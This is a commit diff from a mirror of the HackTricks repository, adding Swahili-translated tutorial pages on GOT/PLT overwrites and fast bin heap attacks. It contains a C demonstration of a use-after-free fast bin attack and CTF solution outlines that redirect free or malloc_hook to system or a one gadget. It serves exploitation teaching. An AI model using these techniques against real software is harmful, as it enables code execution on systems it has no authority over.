Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2025-02-16 22:18:27 +00:00
Code Issues Projects Releases Packages Wiki Activity

Translated ['binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.

Browse source
This commit is contained in:
Translator 2024-06-12 11:29:55 +00:00
parent 82216241aa
commit 42515e2d0c
3 changed files with 192 additions and 22 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

2
SUMMARY.md
View file

@ -731,6 +731,7 @@
* [Use After Free](binary-exploitation/heap/use-after-free/README.md)
* [First Fit](binary-exploitation/heap/use-after-free/first-fit.md)
* [Double Free](binary-exploitation/heap/double-free.md)
* [Heap Overflow](binary-exploitation/heap/heap-overflow.md)
* [Unlink Attack](binary-exploitation/heap/unlink-attack.md)
* [Fast Bin Attack](binary-exploitation/heap/fast-bin-attack.md)
* [Unsorted Bin Attack](binary-exploitation/heap/unsorted-bin-attack.md)
@ -743,7 +744,6 @@
* [House of Orange](binary-exploitation/heap/house-of-orange.md)
* [House of Rabbit](binary-exploitation/heap/house-of-rabbit.md)
* [House of Roman](binary-exploitation/heap/house-of-roman.md)
* [Heap Overflow](binary-exploitation/heap/heap-overflow.md)
* [Common Binary Exploitation Protections & Bypasses](binary-exploitation/common-binary-protections-and-bypasses/README.md)
* [ASLR](binary-exploitation/common-binary-protections-and-bypasses/aslr/README.md)
* [Ret2plt](binary-exploitation/common-binary-protections-and-bypasses/aslr/ret2plt.md)

52
binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.md
View file

@ -6,7 +6,7 @@
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
@ -18,15 +18,15 @@ Njia nyingine za kusaidia HackTricks:
### **GOT: Jedwali la Kielekezi cha Kijumla**
**Jedwali la Kielekezi cha Kijumla (GOT)** ni mbinu inayotumiwa katika programu za kielekezi zinazounganishwa kwa njia ya kudumu kusimamia **anwani za kazi za nje**. Kwa kuwa **anwani hizi hazijulikani hadi wakati wa uendeshaji** (kutokana na uunganishaji wa kudumu), GOT hutoa njia ya **kusasisha kwa kudumu anwani za alama hizi za nje** mara tu zinapopatikana.
**Jedwali la Kielekezi cha Kijumla (GOT)** ni mbinu inayotumiwa katika programu za kielekezi zinazounganishwa kwa njia ya kudumu kusimamia **anwani za kazi za nje**. Kwa kuwa **anwani hizi hazijulikani hadi wakati wa uendeshaji** (kutokana na uunganishaji wa kudumu), GOT hutoa njia ya **kuboresha kwa njia ya kudumu anwani za alama hizi za nje** mara tu zinapopatikana.
Kila kuingia katika GOT inalingana na alama katika maktaba za nje ambazo programu inaweza kuita. Wakati **kazi inaitwa mara ya kwanza, anwani yake halisi inapatikana na kuhifadhiwa katika GOT**. Wito wa baadaye kwa kazi hiyo hutumia anwani iliyohifadhiwa katika GOT, hivyo kuepuka gharama ya kupata tena anwani hiyo.
Kila kuingia katika GOT inalingana na alama katika maktaba za nje ambazo programu inaweza kuita. Wakati **kazi inaitwa mara ya kwanza, anwani yake halisi inabainishwa na kifungu cha kielekezi cha kudumu na kuhifadhiwa katika GOT**. Wito wa baadaye kwa kazi hiyo hutumia anwani iliyohifadhiwa katika GOT, hivyo kuepuka gharama ya kubainisha anwani tena.
### **PLT: Jedwali la Uunganishaji wa Taratibu**
### **PLT: Jedwali la Kielekezi cha Utaratibu**
**Jedwali la Uunganishaji wa Taratibu (PLT)** hufanya kazi karibu na GOT na hutumika kama trampoline kushughulikia wito kwa kazi za nje. Wakati programu **inaita kazi ya nje kwa mara ya kwanza, udhibiti unapitishwa kwa kuingia katika PLT inayohusiana na kazi hiyo**. Kuingia hii ya PLT inahusika na kuita uunganishaji wa kudumu kusuluhisha anwani ya kazi ikiwa haijasuluhishwa tayari. Baada ya anwani kusuluhishwa, inahifadhiwa katika **GOT**.
**Jedwali la Kielekezi cha Utaratibu (PLT)** hufanya kazi karibu na GOT na hutumika kama trampoline kushughulikia wito kwa kazi za nje. Wakati programu **inaita kazi ya nje kwa mara ya kwanza, udhibiti unapitishwa kwa kuingia katika PLT inayohusiana na kazi hiyo**. Kuingia hii ya PLT inahusika na kuita kifungu cha kielekezi cha kudumu kubainisha anwani ya kazi ikiwa haijabainishwa tayari. Baada ya anwani kubainishwa, inahifadhiwa katika **GOT**.
**Hivyo,** kuingia katika GOT hutumiwa moja kwa moja mara tu anwani ya kazi au kivinjari cha nje inaposuluhishwa. **Kuingia katika PLT hutumiwa kurahisisha suluhisho la awali** la anwani hizi kupitia uunganishaji wa kudumu.
**Hivyo,** kuingia za GOT hutumiwa moja kwa moja mara tu anwani ya kazi au kivinjari cha nje inabainishwa. **Kuingia za PLT hutumiwa kurahisisha bainisho la awali** la anwani hizi kupitia kwa kifungu cha kielekezi cha kudumu.
## Pata Utekelezaji
@ -38,44 +38,54 @@ Pata anwani ya jedwali la GOT na: **`objdump -s -j .got ./exec`**
Tazama jinsi baada ya **kupakia** **programu** katika GEF unaweza **kuona** **kazi** zilizo katika **GOT**: `gef➤ x/20x 0xDIR_GOT`
![](<../../.gitbook/assets/image (620) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (2) (2).png>)
![](<../../.gitbook/assets/image (620) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (2) (2).png>)
Kwa kutumia GEF unaweza **kuanza** kikao cha **kudeketa** na kutekeleza **`got`** kuona jedwali la got:
Kwa kutumia GEF unaweza **kuanza** kikao cha **kudebugi** na kutekeleza **`got`** kuona jedwali la got:
![](<../../.gitbook/assets/image (496).png>)
### GOT2Exec
Katika programu ya kielekezi GOT ina **anwani za kazi au** kwa sehemu ya **PLT** ambayo itapakia anwani ya kazi. Lengo la andishi hili la kiholela ni **kubadilisha kuingia katika GOT** ya kazi ambayo itatekelezwa baadaye **na** **anwani** ya PLT ya **kazi ya `system`** kwa mfano.
Katika programu ya kielekezi GOT ina **anwani za kazi au** kwa **sehemu ya PLT** ambayo itapakia anwani ya kazi. Lengo la andishi hili la kiholela ni **kubadilisha kuingia cha GOT** cha kazi ambayo itatekelezwa baadaye **na** **anwani** ya PLT ya **kazi ya `system`** kwa mfano.
Kwa kawaida, uta **badilisha** **GOT** ya **kazi** ambayo **itaitwa na parameta zinazodhibitiwa na wewe** (hivyo utaweza kudhibiti parameta zinazotumwa kwa kazi ya mfumo).
Kwa kawaida, utabatilisha **GOT** ya **kazi** ambayo **itaitwa na parameta zinazodhibitiwa na wewe** (hivyo utaweza kudhibiti parameta zinazotumwa kwa kazi ya mfumo).
Ikiwa **`system`** **haitumiwi** na hati, kazi ya mfumo **haitakuwa na kuingia** katika PLT. Katika hali hii, utahitaji **kuvuja kwanza anwani** ya kazi ya `system` na kisha kubadilisha GOT ili ielekeze kwenye anwani hii.
Ikiwa **`system`** **haitumiwi** na hati, kazi ya mfumo **haitakuwa na kuingia katika PLT**. Katika hali hii, utahitaji **kuvuja kwanza anwani** ya kazi ya `system` na kisha kubadilisha GOT ili ielekeze kwenye anwani hii.
Unaweza kuona anwani za PLT na **`objdump -j .plt -d ./vuln_binary`**
## Kuingia kwa GOT ya libc
## Kuingia za GOT za libc
**GOT ya libc** kawaida inaandikwa na **RELRO ya sehemu**, ikifanya iwe lengo zuri kwa hili ikiaminika ni rahisi kugundua anwani yake ([**ASLR**](../common-binary-protections-and-bypasses/aslr/)).
**GOT ya libc** kawaida inakusanywa na **RELRO ya sehemu**, ikifanya iwe lengo zuri kwa kudhani ikiwa inawezekana kugundua anwani yake ([**ASLR**](../common-binary-protections-and-bypasses/aslr/)).
Kazi za kawaida za libc zitaita **kazi nyingine za ndani** ambazo GOT yake inaweza kubadilishwa ili kupata utekelezaji wa kanuni.
Kazi za kawaida za libc zitaita **kazi za ndani zingine** ambazo GOT yake inaweza kubadilishwa ili kupata utekelezaji wa nambari.
Pata [**maelezo zaidi kuhusu mbinu hii hapa**](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md#1---targetting-libc-got-entries).
## **Kifaa cha Moja**
## **Free2system**
Katika mashindano ya kudukua kumbukumbu, mara nyingi unaweza kudhibiti maudhui ya vipande na wakati mwingine hata kubadilisha jedwali la GOT. Mbinu rahisi ya kupata RCE ikiwa vifaa vya one hazipatikani ni kubadilisha anwani ya `free` ya GOT ili ielekeze kwa `system` na kuandika ndani ya kipande `"/bin/sh"`. Kwa njia hii wakati kipande hiki kitakapofutwa, itatekeleza `system("/bin/sh")`.
## **Kifaa cha One**
{% content-ref url="../rop-return-oriented-programing/ret2lib/one-gadget.md" %}
[one-gadget.md](../rop-return-oriented-programing/ret2lib/one-gadget.md)
{% endcontent-ref %}
## **Kudhuru GOT kutoka kwa Kumbukumbu**
Njia ya kawaida ya kupata RCE kutoka kwa udhaifu wa kumbukumbu ni kudhuru fastbin ili iwezekane kuongeza sehemu ya jedwali la GOT ndani ya fast bin, hivyo wakati kipande hicho kitakapopewa itakuwa inawezekana **kubadilisha kielekezi cha kazi, kawaida `free`**.\
Kisha, kuelekeza `free` kwa `system` na kufuta kipande ambapo imeandikwa `/bin/sh\x00` kutatekeleza kifaa cha mfumo.
Inawezekana kupata [**mfano hapa**](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/chunk\_extend\_overlapping/#hitcon-trainging-lab13)**.**
## **Kinga**
Kinga ya **RELRO kamili** inalenga kulinda dhidi ya mbinu hii kwa kusuluhisha anwani zote za kazi wakati programu inapoanza na kufanya **jedwali la GOT liwe la kusoma tu** baada ya hapo:
Kinga ya **Full RELRO** inalenga kulinda dhidi ya mbinu hii kwa kubainisha anwani zote za kazi wakati programu inapoanza na kufanya **jedwali la GOT liwe la kusoma tu** baada ya hapo:
{% content-ref url="../common-binary-protections-and-bypasses/relro.md" %}
[relro.md](../common-binary-protections-and-bypasses/relro.md)
{% endcontent-ref %}
## Marejeo
* [https://ir0nstone.gitbook.io/notes/types/stack/got-overwrite/exploiting-a-got-overwrite](https://ir0nstone.gitbook.io/notes/types/stack/got-overwrite/exploiting-a-got-overwrite)
@ -83,14 +93,14 @@ Kinga ya **RELRO kamili** inalenga kulinda dhidi ya mbinu hii kwa kusuluhisha an
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>

160
binary-exploitation/heap/fast-bin-attack.md Normal file
View file

@ -0,0 +1,160 @@
# Shambulio la Fast Bin
<details>
<summary><strong>Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## Taarifa Msingi
Kwa sababu fast bin ni kiungo cha moja kwa moja, kuna kinga chache sana kuliko katika mabakuli mengine na tu **kubadilisha anwani katika kipande cha fast bin kilichofutwa** ni ya kutosha kuweza **kuweka kipande baadaye katika anwani yoyote ya kumbukumbu**.
Kwa muhtasari:
{% code overflow="wrap" %}
```c
ptr0 = malloc(0x20);
ptr1 = malloc(0x20);
// Put them in fast bin (suppose tcache is full)
free(ptr0)
free(ptr1)
// Use-after-free
// Modify the address where the free chunk of ptr1 is pointing
*ptr1 = (unsigned long)((char *)&<address>);
ptr2 = malloc(0x20); // This will get ptr1
ptr3 = malloc(0x20); // This will get a chunk in the <address> which could be abuse to overwrite arbitrary content inside of it
```
{% endcode %}
Unaweza kupata mfano kamili katika namna iliyoelezwa vizuri sana katika nambari kutoka [https://guyinatuxedo.github.io/28-fastbin\_attack/explanation\_fastbinAttack/index.html](https://guyinatuxedo.github.io/28-fastbin\_attack/explanation\_fastbinAttack/index.html):
```c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(void)
{
puts("Today we will be discussing a fastbin attack.");
puts("There are 10 fastbins, which act as linked lists (they're separated by size).");
puts("When a chunk is freed within a certain size range, it is added to one of the fastbin linked lists.");
puts("Then when a chunk is allocated of a similar size, it grabs chunks from the corresponding fastbin (if there are chunks in it).");
puts("(think sizes 0x10-0x60 for fastbins, but that can change depending on some settings)");
puts("\nThis attack will essentially attack the fastbin by using a bug to edit the linked list to point to a fake chunk we want to allocate.");
puts("Pointers in this linked list are allocated when we allocate a chunk of the size that corresponds to the fastbin.");
puts("So we will just allocate chunks from the fastbin after we edit a pointer to point to our fake chunk, to get malloc to return a pointer to our fake chunk.\n");
puts("So the tl;dr objective of a fastbin attack is to allocate a chunk to a memory region of our choosing.\n");
puts("Let's start, we will allocate three chunks of size 0x30\n");
unsigned long *ptr0, *ptr1, *ptr2;
ptr0 = malloc(0x30);
ptr1 = malloc(0x30);
ptr2 = malloc(0x30);
printf("Chunk 0: %p\n", ptr0);
printf("Chunk 1: %p\n", ptr1);
printf("Chunk 2: %p\n\n", ptr2);
printf("Next we will make an integer variable on the stack. Our goal will be to allocate a chunk to this variable (because why not).\n");
int stackVar = 0x55;
printf("Integer: %x\t @: %p\n\n", stackVar, &stackVar);
printf("Proceeding that I'm going to write just some data to the three heap chunks\n");
char *data0 = "00000000";
char *data1 = "11111111";
char *data2 = "22222222";
memcpy(ptr0, data0, 0x8);
memcpy(ptr1, data1, 0x8);
memcpy(ptr2, data2, 0x8);
printf("We can see the data that is held in these chunks. This data will get overwritten when they get added to the fastbin.\n");
printf("Chunk 0: %s\n", (char *)ptr0);
printf("Chunk 1: %s\n", (char *)ptr1);
printf("Chunk 2: %s\n\n", (char *)ptr2);
printf("Next we are going to free all three pointers. This will add all of them to the fastbin linked list. We can see that they hold pointers to chunks that will be allocated.\n");
free(ptr0);
free(ptr1);
free(ptr2);
printf("Chunk0 @ 0x%p\t contains: %lx\n", ptr0, *ptr0);
printf("Chunk1 @ 0x%p\t contains: %lx\n", ptr1, *ptr1);
printf("Chunk2 @ 0x%p\t contains: %lx\n\n", ptr2, *ptr2);
printf("So we can see that the top two entries in the fastbin (the last two chunks we freed) contains pointers to the next chunk in the fastbin. The last chunk in there contains `0x0` as the next pointer to indicate the end of the linked list.\n\n");
printf("Now we will edit a freed chunk (specifically the second chunk \"Chunk 1\"). We will be doing it with a use after free, since after we freed it we didn't get rid of the pointer.\n");
printf("We will edit it so the next pointer points to the address of the stack integer variable we talked about earlier. This way when we allocate this chunk, it will put our fake chunk (which points to the stack integer) on top of the free list.\n\n");
*ptr1 = (unsigned long)((char *)&stackVar);
printf("We can see it's new value of Chunk1 @ %p\t hold: 0x%lx\n\n", ptr1, *ptr1);
printf("Now we will allocate three new chunks. The first one will pretty much be a normal chunk. The second one is the chunk which the next pointer we overwrote with the pointer to the stack variable.\n");
printf("When we allocate that chunk, our fake chunk will be at the top of the fastbin. Then we can just allocate one more chunk from that fastbin to get malloc to return a pointer to the stack variable.\n\n");
unsigned long *ptr3, *ptr4, *ptr5;
ptr3 = malloc(0x30);
ptr4 = malloc(0x30);
ptr5 = malloc(0x30);
printf("Chunk 3: %p\n", ptr3);
printf("Chunk 4: %p\n", ptr4);
printf("Chunk 5: %p\t Contains: 0x%x\n", ptr5, (int)*ptr5);
printf("\n\nJust like that, we executed a fastbin attack to allocate an address to a stack variable using malloc!\n");
}
```
## Mifano
* **CTF** [**https://guyinatuxedo.github.io/28-fastbin\_attack/0ctf\_babyheap/index.html**](https://guyinatuxedo.github.io/28-fastbin\_attack/0ctf\_babyheap/index.html)**:**
* Inawezekana kutenga vipande, kuvifuta, kusoma maudhui yao na kuvijaza (kwa udhaifu wa kujaa).
* **Consolidate chunk for infoleak**: Mbinu hii ni kimsingi kutumia udhaifu wa kujaa ili kuunda ukubwa wa uwongo wa awali ili kipande cha awali kiwekwe ndani ya kikubwa zaidi, hivyo wakati wa kutenga kikubwa kinachotia kipande kingine, inawezekana kuchapisha data yake na kuvuja anwani ya libc (main\_arena+88).
* **Overwrite malloc hook**: Kwa hili, na kutumia hali ya kufunika ya awali, ilikuwa inawezekana kuwa na vipande 2 vilivyokuwa vikionyesha kwenye kumbukumbu ile ile. Kwa hivyo, kuvifuta vyote viwili (kwa kufuta kipande kingine kati yake kuepuka ulinzi) ilikuwa inawezekana kuwa na kipande kimoja katika sanduku la haraka mara 2. Kisha, ilikuwa inawezekana kutenga tena, kubadilisha anwani ya kipande kinachofuata ili ielekee kidogo kabla ya malloc\_hook (hivyo inaelekeza kwenye nambari ambayo malloc inafikiria ni ukubwa huru - kuepuka nyingine), kutenga tena na kisha kutenga kipande kingine ambacho kitapokea anwani za vifaa vya malloc. Hatimaye **gadget moja** iliandikwa hapo.
* **CTF** [**https://guyinatuxedo.github.io/28-fastbin\_attack/csaw17\_auir/index.html**](https://guyinatuxedo.github.io/28-fastbin\_attack/csaw17\_auir/index.html)**:**
* Kuna kujaa kwa sanduku na mtumiaji baada ya kufuta na kufuta mara mbili kwa sababu wakati kipande kinapofutwa inawezekana kutumia upya na kufuta tena pointi
* **Libc info leak**: Tuache vipande vichache na vitapata pointi kwa sehemu ya eneo la uwanja mkuu. Kwa kuwa unaweza kutumia upya pointi zilizofutwa, soma anwani hii.
* **Fast bin attack**: Pointi zote kwa kutengwa zimehifadhiwa ndani ya safu, hivyo tunaweza kufuta vipande vichache vya sanduku la haraka na katika la mwisho kubadilisha anwani ili ielekee kidogo kabla ya safu hii ya pointi. Kisha, tengeneza vipande vichache na ukubwa sawa na tutapata kwanza halali na kisha bandia inayotia safu ya pointi. Sasa tunaweza kubadilisha pointi hizi za kutengwa ili zielekee anwani ya `free` ili ielekee mfumo na kisha andika kipande 1 `"/bin/sh"` kisha `free(chunk1)` ambayo itatekeleza `system("/bin/sh")`.
Unaweza kupata shambulio la Fast Bin lililotumiwa kupitia shambulio la sanduku lisilo na mpangilio katika mifano kutoka:
{% content-ref url="unsorted-bin-attack.md" %}
[unsorted-bin-attack.md](unsorted-bin-attack.md)
{% endcontent-ref %}
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>